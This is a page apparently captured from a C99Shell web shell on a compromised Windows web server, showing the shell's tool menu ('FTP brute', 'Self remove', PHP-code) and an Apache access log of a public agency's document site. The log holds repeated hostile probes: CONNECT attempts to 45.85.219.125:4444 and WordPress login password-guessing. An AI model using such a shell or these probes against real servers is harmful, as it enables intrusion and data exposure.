!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 7.33 GB of 239.26 GB (3.07%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     access.2022.10.19.log (2.41 MB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
172.22.2.4 - - [18/Oct/2022:23:58:25 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
23.140.88.145 - - [19/Oct/2022:00:00:21 -0500] "CONNECT 45.85.219.125:4444 HTTP/1.1" 405 941
172.22.2.4 - - [18/Oct/2022:23:59:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
201.245.192.253 - - [19/Oct/2022:00:01:21 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43296
114.119.141.69 - - [19/Oct/2022:00:01:57 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/2007.pdf HTTP/1.1" 200 338116
216.245.221.92 - - [19/Oct/2022:00:02:04 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.89 - - [19/Oct/2022:00:03:34 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12506
207.46.13.89 - - [19/Oct/2022:00:03:35 -0500] "GET /autoliquidacion2020/index.php?dir=Calidad+del+aire+auditiva+y+visual-%2FPrograma+de+Autorregulaci%F3n+Ambiental+para+Fuentes+M%F3viles%2F HTTP/1.1" 200 3288
207.46.13.190 - - [19/Oct/2022:00:04:05 -0500] "GET /forest/ HTTP/1.1" 200 12041
66.249.65.13 - - [19/Oct/2022:00:04:27 -0500] "-" 408 -
201.244.219.152 - - [19/Oct/2022:00:04:28 -0500] "GET /BLA/resoluciones/AUTOS%202014/3340.pdf HTTP/1.1" 200 554756
201.244.219.152 - - [19/Oct/2022:00:04:29 -0500] "GET /BLA/resoluciones/AUTOS%202014/3340.pdf HTTP/1.1" 206 1
201.244.219.152 - - [19/Oct/2022:00:04:37 -0500] "GET /BLA/resoluciones/AUTOS%202014/3340.pdf HTTP/1.1" 200 554756
172.22.2.4 - - [19/Oct/2022:00:05:26 -0500] "GET /BLA/boletinlegal/ab2g HTTP/1.1" 404 1018
172.22.2.4 - - [19/Oct/2022:00:05:27 -0500] "GET /BLA/boletinlegal/ab2h HTTP/1.1" 404 1018
172.22.2.4 - - [19/Oct/2022:00:04:15 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
23.140.88.145 - - [19/Oct/2022:00:06:23 -0500] "CONNECT 45.85.219.125:4444 HTTP/1.1" 405 941
201.245.192.253 - - [19/Oct/2022:00:06:22 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43296
172.22.2.4 - - [19/Oct/2022:00:05:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
181.56.122.65 - - [19/Oct/2022:00:06:41 -0500] "GET /bla/resoluciones/resoluciones%202007/res%202007%202401%20al%202500/RESOLUCION%202488%20DE%202007.pdf HTTP/1.1" 200 387774
181.56.122.65 - - [19/Oct/2022:00:06:41 -0500] "GET /bla/resoluciones/resoluciones%202007/res%202007%202401%20al%202500/RESOLUCION%202488%20DE%202007.pdf HTTP/1.1" 206 1025
181.56.122.65 - - [19/Oct/2022:00:06:41 -0500] "GET /bla/resoluciones/resoluciones%202007/res%202007%202401%20al%202500/RESOLUCION%202488%20DE%202007.pdf HTTP/1.1" 200 387774
172.22.2.4 - - [19/Oct/2022:00:05:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 50799
216.245.221.92 - - [19/Oct/2022:00:07:04 -0500] "HEAD / HTTP/1.1" 200 -
186.144.238.212 - - [19/Oct/2022:00:10:04 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
186.144.238.212 - - [19/Oct/2022:00:10:04 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
186.144.238.212 - - [19/Oct/2022:00:10:04 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
207.46.13.190 - - [19/Oct/2022:00:11:06 -0500] "GET /BLA/resoluciones/00001767.tif HTTP/1.1" 404 1018
201.245.192.253 - - [19/Oct/2022:00:11:20 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43296
172.22.2.4 - - [19/Oct/2022:00:10:05 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [19/Oct/2022:00:12:04 -0500] "HEAD / HTTP/1.1" 200 -
23.140.88.145 - - [19/Oct/2022:00:12:22 -0500] "CONNECT 45.85.219.125:4444 HTTP/1.1" 405 941
172.22.2.4 - - [19/Oct/2022:00:10:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
152.61.192.232 - - [19/Oct/2022:00:13:40 -0500] "GET / HTTP/1.1" 200 319
181.55.68.44 - - [19/Oct/2022:00:13:41 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
201.245.192.253 - - [19/Oct/2022:00:16:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43296
114.119.132.76 - - [19/Oct/2022:00:16:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/4262.pdf HTTP/1.1" 200 628572
216.245.221.92 - - [19/Oct/2022:00:17:04 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [19/Oct/2022:00:15:55 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [19/Oct/2022:00:16:46 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56732
23.140.88.145 - - [19/Oct/2022:00:18:27 -0500] "CONNECT 45.85.219.125:4444 HTTP/1.1" 405 941
207.46.13.89 - - [19/Oct/2022:00:18:47 -0500] "GET /BLA/resoluciones/AUTOS%202019/5247.pdf HTTP/1.1" 200 458068
207.46.13.89 - - [19/Oct/2022:00:19:16 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12506
152.61.128.50 - - [19/Oct/2022:00:19:44 -0500] "GET / HTTP/1.1" 200 319
157.55.39.202 - - [19/Oct/2022:00:19:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0833.pdf HTTP/1.1" 200 389041
201.245.192.253 - - [19/Oct/2022:00:21:18 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43296
201.245.192.253 - - [19/Oct/2022:00:21:36 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43273
201.245.192.253 - - [19/Oct/2022:00:21:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43441
216.245.221.92 - - [19/Oct/2022:00:22:04 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.97 - - [19/Oct/2022:00:22:08 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.97 - - [19/Oct/2022:00:22:10 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
172.22.2.4 - - [19/Oct/2022:00:21:45 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
207.46.13.89 - - [19/Oct/2022:00:23:48 -0500] "GET /bla/resoluciones/resoluciones%202007/res%202007%204101%20al%204200/RESOLUCION%204179%20DE%202007.pdf HTTP/1.1" 304 -
172.22.2.4 - - [19/Oct/2022:00:22:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
207.46.13.84 - - [19/Oct/2022:00:24:22 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202013/0195.pdf HTTP/1.1" 304 -
23.140.88.145 - - [19/Oct/2022:00:24:29 -0500] "CONNECT 45.85.219.125:4444 HTTP/1.1" 405 941
191.95.165.227 - - [19/Oct/2022:00:24:48 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX19m03wlXOzMJBbFGnC9hPyW7qhU+J4+EfAwyXfKaK3uEC8UI71YuPB8LA3q74t7MTpAPrpWAxEFhQ==&y=U2FsdGVkX196aH1xDPyvR45Y/2PNQM7F8ojwwKAcvstAv5KxFznPVgKF4Sci37Ci HTTP/1.1" 200 30
191.95.165.227 - - [19/Oct/2022:00:24:48 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18ZALyKQQubMywAf8zDhSg6ssT4jkayMaB0DBOJnGUtrEqCqXyDC69dGUgnpf0qyOboZvl0Vu88eJMhIOMGgzZFm+p/4t/uDzg=&u=U2FsdGVkX18cD0+FPmedmvlLx5yIcpLg/SxMlHeJQQc=&y=U2FsdGVkX196aH1xDPyvR45Y/2PNQM7F8ojwwKAcvstAv5KxFznPVgKF4Sci37Ci HTTP/1.1" 200 97
191.95.165.227 - - [19/Oct/2022:00:24:49 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+xRO7YnaE83IKNPLhY6FB2MCuyaR28k3A4MM6eykP5tWnKvHc1yp8AjAzhUPgtNZJZJjzIhs8+TYUb+wxS7mQVHA+1SaRXkasZJ9ynIEE+7/aqCYGw4KFsyNNO2ZU+idzt3hMWROcg7uX23N5YJ0CbqKTPtUT7d6XhbPJvhOqlu/fRnedzwj3cz8aEiqzaemSINRV0QuaLa2Von43OzIlHpLfCNew4gYDcMQ1y0gawEGXh23uuWOdB1c6PDQg3hze8v03ntBns2EbTQDpyoChKvMIUeCAIls4O3UOBwwIem+ZWAmsY/TAMADRnD2+ek1cSOLdE+7coqAV6enhxLpyDfdAbgLHtBK1ejx5tH/90Bt9bf6B1KSpHjYRZF+Juz8SwsYM1E1v/ORNGlwvnKRpCtxY0ozMIC05LVQEvgbPCnkZcmw+GkrwBq3WJYwpxPRiYfROXVxxMM6QHEdXl5ay/fdTynt41S4616hOUlZ+Qph59imLCQBK9qT7oI5PqVoNH037cgHs7/Bj5aTVoRlOm92OMmH1ufwPFwa5GdetyAxlxEnQpuECiZc51ryT3AxrL7p3S/fCSEKrQIngqc+gVa5vtsdpJyGsJijIf58JCa/rg9xq/DbJDAdvkD5xeqEo7rWAJGFJlLj/JqbWh2W0uY2QXQhoThLp7jqkh0gVY89t2qEQbcZOHPnZSvmXfh7N/6HSFTPIqnaqMj3Nb49F+rJSzrvDN4OuT7+Nv1U50gMcBtX1BW3M3GAb4cVs/Mxk9JI4UCzMTcdb3Yu+gybjJ+rLLWyNOX4K2f3ku96pqo23Tl261KmOL3aVoGZ4hONUFQ+bygqmH1FE+L424Vf2Jr76mJzsdQ3jmP//bUqR63/oJ/WeYROP1pg4+3BttL+cHVz2EO2MaZoQUAu4MxjqKz3Ujg5k58QX/YbShl0WNYIAlPC9b/8OT4sc8q9X/W9buL5leDVS+DxQdDP5QiOolhWA+RHjIYIzY0hdZIY7cv+3Z9oMTV2a/y0TWUQN0fmaV3sN5H+qUHst6dEuWVlGQV17rhcLvLSlmgFVIVxFG1xoWC9mOypXBkfQZQlV7cfyUAZnEzyaxktf765Cdy8eZJtYdLinZl7hGoksCOu1apECCBA7UXgcBuz0g6mFC1b0+CE7+2pVANqmtkZWul1zDQ837/GJRyD40qjeBZHcV1U9HQZZA9syB2qSxFjAfK1UpUTrDZmO1sQGPPt3etj8pQH2o7S5tlYIxMTHYAcDreosljTvf7b8GBrOdFUmGdQ6XExRJPH0GtQUZJ1bpSz9NGglPUss6zMocK1CB4qbFpu2Jz5yC6aOKdH5OaBfkxnSuhQNWeikuhBQev/9BDj9pD5MGCWvnwaSO/Y/Yqo1NVqLUCA4b0RWGcAJDPUjtPE5QcPWXNtbuqACr68vx7kuc9TY9PuChcDk=&u=U2FsdGVkX18cD0+FPmedmvlLx5yIcpLg/SxMlHeJQQc=&y=U2FsdGVkX196aH1xDPyvR45Y/2PNQM7F8ojwwKAcvstAv5KxFznPVgKF4Sci37Ci HTTP/1.1" 200 1159
191.95.165.227 - - [19/Oct/2022:00:24:49 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19nT//khTti+CzP0kEf7KkIrEWkLbjjxrASwN4LDjyB1ZcL8lcSDV0DkxlURHuGDqjHeusU0Fs0KcapuGZa3U8djQUZ1Wg9oPwM1vifTb3u7XhGQC45I+npcVQT/X1Gdni7PfTXwH566KcN0GXyZ0Xr0qy5fFoMJMWF3F/NgZEo4iCEj/y1umjosR4fvC9oxddM20GFIcT9y82IhSSsCxArAdnzmwCIKR8oB4Iohd0sGlgs09K6+xI/RPAGKSfWMtB8tyYEy1KEIDQCD98a2oEu4W6YJJ+1v5WAzsuMm1//loRuDPua6b6a1DlB4V1r6l+PFyju5MMHU2VH75Vc/XRibmfKNfRB1Fg=&u=U2FsdGVkX18cD0+FPmedmvlLx5yIcpLg/SxMlHeJQQc=&y=U2FsdGVkX196aH1xDPyvR45Y/2PNQM7F8ojwwKAcvstAv5KxFznPVgKF4Sci37Ci HTTP/1.1" 200 196
207.46.13.40 - - [19/Oct/2022:00:24:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20851-900/00000852.tif HTTP/1.1" 200 102838
191.95.165.227 - - [19/Oct/2022:00:24:49 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX19m03wlXOzMJBbFGnC9hPyW7qhU+J4+EfAwyXfKaK3uEC8UI71YuPB8LA3q74t7MTpAPrpWAxEFhQ== HTTP/1.1" 200 30992
185.119.81.97 - - [19/Oct/2022:00:25:32 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.97 - - [19/Oct/2022:00:25:33 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
201.245.192.253 - - [19/Oct/2022:00:26:17 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43296
157.55.39.25 - - [19/Oct/2022:00:26:29 -0500] "GET /Publicaciones/2022EE178119.pdf HTTP/1.1" 404 228
216.245.221.92 - - [19/Oct/2022:00:27:04 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [19/Oct/2022:00:26:27 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 59828
157.55.39.25 - - [19/Oct/2022:00:28:59 -0500] "GET /BLA/resoluciones/00001785.tif HTTP/1.1" 404 1018
172.22.2.4 - - [19/Oct/2022:00:27:35 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [19/Oct/2022:00:28:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
23.140.88.145 - - [19/Oct/2022:00:30:35 -0500] "CONNECT 45.85.219.125:4444 HTTP/1.1" 405 941
201.245.192.253 - - [19/Oct/2022:00:31:16 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43296
207.46.13.190 - - [19/Oct/2022:00:31:28 -0500] "GET /forest/ HTTP/1.1" 200 12041
201.245.192.253 - - [19/Oct/2022:00:31:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43273
201.245.192.253 - - [19/Oct/2022:00:31:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43441
114.119.141.42 - - [19/Oct/2022:00:31:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/2833.pdf HTTP/1.1" 200 4720940
216.245.221.92 - - [19/Oct/2022:00:32:04 -0500] "HEAD / HTTP/1.1" 200 -
199.16.157.180 - - [19/Oct/2022:00:33:10 -0500] "GET /images/acuerdos-1_optimized.jpeg HTTP/1.1" 200 79514
157.55.39.202 - - [19/Oct/2022:00:33:44 -0500] "GET /BLA/resoluciones/AUTOS%202022/3401.pdf HTTP/1.1" 200 962894
172.22.2.4 - - [19/Oct/2022:00:33:25 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [19/Oct/2022:00:34:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [19/Oct/2022:00:34:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54003
201.245.192.253 - - [19/Oct/2022:00:36:16 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43296
173.252.83.2 - - [19/Oct/2022:00:36:30 -0500] "GET /images/reunion-planta-termovalorizacion-11-mayo.jpg HTTP/1.1" 200 34782
207.46.13.89 - - [19/Oct/2022:00:36:38 -0500] "GET /galeria/galeria/fotos/cusumbo4P.jpg HTTP/1.1" 200 34990
23.140.88.145 - - [19/Oct/2022:00:36:43 -0500] "CONNECT 45.85.219.125:4444 HTTP/1.1" 405 941
216.245.221.92 - - [19/Oct/2022:00:37:04 -0500] "HEAD / HTTP/1.1" 200 -
128.14.134.134 - - [19/Oct/2022:00:37:27 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110197
193.142.146.35 - - [19/Oct/2022:00:38:42 -0500] "GET / HTTP/1.1" 200 319
193.142.146.35 - - [19/Oct/2022:00:38:43 -0500] "POST /HNAP1/ HTTP/1.1" 404 1018
207.46.13.89 - - [19/Oct/2022:00:38:48 -0500] "GET /BLA/resoluciones/00000854.tif HTTP/1.1" 404 1018
172.22.2.4 - - [19/Oct/2022:00:39:15 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [19/Oct/2022:00:40:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
201.245.192.253 - - [19/Oct/2022:00:41:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43296
201.245.192.253 - - [19/Oct/2022:00:41:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43273
201.245.192.253 - - [19/Oct/2022:00:41:40 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43441
172.22.2.4 - - [19/Oct/2022:00:40:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54356
216.245.221.92 - - [19/Oct/2022:00:42:04 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [19/Oct/2022:00:42:26 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisC-035-16.docx HTTP/1.1" 304 -
23.140.88.145 - - [19/Oct/2022:00:43:00 -0500] "CONNECT 45.85.219.125:4444 HTTP/1.1" 405 941
185.119.81.97 - - [19/Oct/2022:00:43:35 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.97 - - [19/Oct/2022:00:43:36 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
207.46.13.190 - - [19/Oct/2022:00:43:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202000/2000%2001-49.tif HTTP/1.1" 200 5230523
114.119.140.136 - - [19/Oct/2022:00:44:40 -0500] "-" 408 -
201.245.192.253 - - [19/Oct/2022:00:46:14 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43296
172.22.2.4 - - [19/Oct/2022:00:45:05 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [19/Oct/2022:00:47:04 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [19/Oct/2022:00:45:56 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
92.118.39.30 - - [19/Oct/2022:00:48:34 -0500] "GET / HTTP/1.0" 200 319
23.140.88.145 - - [19/Oct/2022:00:48:57 -0500] "CONNECT 45.85.219.125:4444 HTTP/1.1" 405 941
207.46.13.40 - - [19/Oct/2022:00:49:32 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12506
201.245.192.253 - - [19/Oct/2022:00:51:13 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43296
172.22.2.4 - - [19/Oct/2022:00:51:21 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1038
186.155.49.150 - - [19/Oct/2022:00:51:28 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
186.155.49.150 - - [19/Oct/2022:00:51:34 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2013%2F HTTP/1.1" 200 238108
186.155.49.150 - - [19/Oct/2022:00:51:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202013/0440.pdf HTTP/1.1" 200 2453352
186.155.49.150 - - [19/Oct/2022:00:51:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202013/0440.pdf HTTP/1.1" 206 1025
186.155.49.150 - - [19/Oct/2022:00:51:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202013/0440.pdf HTTP/1.1" 200 2453352
216.245.221.92 - - [19/Oct/2022:00:52:04 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [19/Oct/2022:00:52:23 -0500] "GET /BLA/boletinlegal/login HTTP/1.1" 404 1018
172.22.2.4 - - [19/Oct/2022:00:50:55 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
181.55.68.44 - - [19/Oct/2022:00:52:41 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2010%2F HTTP/1.1" 200 277106
172.22.2.4 - - [19/Oct/2022:00:51:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
23.140.88.145 - - [19/Oct/2022:00:55:06 -0500] "CONNECT 45.85.219.125:4444 HTTP/1.1" 405 941
207.46.13.84 - - [19/Oct/2022:00:56:02 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1384.pdf HTTP/1.1" 200 343307
201.245.192.253 - - [19/Oct/2022:00:56:11 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43296
207.46.13.89 - - [19/Oct/2022:00:56:20 -0500] "GET /BLA/resoluciones/AUTOS%202022/2927.pdf HTTP/1.1" 200 414764
216.245.221.92 - - [19/Oct/2022:00:57:04 -0500] "HEAD / HTTP/1.1" 200 -
114.119.141.52 - - [19/Oct/2022:00:57:12 -0500] "GET /BLA/resoluciones/AUTOS%202017/2429.pdf HTTP/1.1" 200 1924542
157.55.39.202 - - [19/Oct/2022:00:57:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202013/1175.pdf HTTP/1.1" 304 -
172.22.2.4 - - [19/Oct/2022:00:58:04 -0500] "GET /BLA/boletinlegal/Directivas/2017/Directiva%20No.%2001%20del%2027%20de%20Junio%20de%202018.pdf HTTP/1.1" 304 -
172.22.2.4 - - [19/Oct/2022:00:56:45 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
114.119.141.53 - - [19/Oct/2022:00:58:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/RESOLUCION%206935%20DE%202010.PDF HTTP/1.1" 200 44771
207.46.13.89 - - [19/Oct/2022:00:58:59 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12506
172.22.2.4 - - [19/Oct/2022:00:57:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56014
152.61.192.232 - - [19/Oct/2022:00:59:18 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.192.232 - - [19/Oct/2022:00:59:19 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.192.232 - - [19/Oct/2022:00:59:19 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
207.46.13.40 - - [19/Oct/2022:01:00:41 -0500] "GET /BLA/resoluciones/00000342.tif HTTP/1.1" 404 1018
23.140.88.145 - - [19/Oct/2022:01:01:05 -0500] "CONNECT 45.85.219.125:4444 HTTP/1.1" 405 941
201.245.192.253 - - [19/Oct/2022:01:01:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43296
216.245.221.92 - - [19/Oct/2022:01:02:04 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [19/Oct/2022:01:02:35 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [19/Oct/2022:01:03:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
152.61.128.50 - - [19/Oct/2022:01:05:34 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.128.50 - - [19/Oct/2022:01:05:35 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.128.50 - - [19/Oct/2022:01:05:35 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
114.119.132.76 - - [19/Oct/2022:01:06:10 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/3996.pdf HTTP/1.1" 200 426667
201.245.192.253 - - [19/Oct/2022:01:06:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43296
216.245.221.92 - - [19/Oct/2022:01:07:04 -0500] "HEAD / HTTP/1.1" 200 -
23.140.88.145 - - [19/Oct/2022:01:07:16 -0500] "CONNECT 45.85.219.125:4444 HTTP/1.1" 405 941
128.14.141.34 - - [19/Oct/2022:01:09:28 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [19/Oct/2022:01:08:25 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [19/Oct/2022:01:09:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
201.245.192.253 - - [19/Oct/2022:01:11:08 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43296
185.119.81.97 - - [19/Oct/2022:01:11:18 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.97 - - [19/Oct/2022:01:11:19 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
216.245.221.92 - - [19/Oct/2022:01:12:04 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [19/Oct/2022:01:12:30 -0500] "GET /BLA/boletinlegal/ab2g HTTP/1.1" 404 1018
172.22.2.4 - - [19/Oct/2022:01:12:31 -0500] "GET /BLA/boletinlegal/ab2h HTTP/1.1" 404 1018
23.140.88.145 - - [19/Oct/2022:01:13:08 -0500] "CONNECT 45.85.219.125:4444 HTTP/1.1" 405 941
172.22.2.4 - - [19/Oct/2022:01:12:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
172.22.2.4 - - [19/Oct/2022:01:14:15 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [19/Oct/2022:01:16:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43296
66.249.65.15 - - [19/Oct/2022:01:16:28 -0500] "-" 408 -
172.22.2.4 - - [19/Oct/2022:01:15:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
216.245.221.92 - - [19/Oct/2022:01:17:04 -0500] "HEAD / HTTP/1.1" 200 -
23.90.160.114 - - [19/Oct/2022:01:19:04 -0500] "GET / HTTP/1.1" 200 319
23.140.88.145 - - [19/Oct/2022:01:19:11 -0500] "CONNECT 45.85.219.125:4444 HTTP/1.1" 405 941
201.245.192.253 - - [19/Oct/2022:01:21:06 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43296
201.245.192.253 - - [19/Oct/2022:01:21:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43131
201.245.192.253 - - [19/Oct/2022:01:21:40 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43448
172.22.2.4 - - [19/Oct/2022:01:20:05 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
114.119.141.42 - - [19/Oct/2022:01:22:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/7337.pdf HTTP/1.1" 200 344571
216.245.221.92 - - [19/Oct/2022:01:22:04 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [19/Oct/2022:01:20:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
23.140.88.145 - - [19/Oct/2022:01:25:17 -0500] "CONNECT 45.85.219.125:4444 HTTP/1.1" 405 941
201.245.192.253 - - [19/Oct/2022:01:26:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43296
114.119.141.73 - - [19/Oct/2022:01:26:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/3865.pdf HTTP/1.1" 200 296247
216.245.221.92 - - [19/Oct/2022:01:27:04 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [19/Oct/2022:01:25:55 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [19/Oct/2022:01:26:46 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51630
172.22.2.4 - - [19/Oct/2022:01:28:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
201.245.192.253 - - [19/Oct/2022:01:31:04 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43296
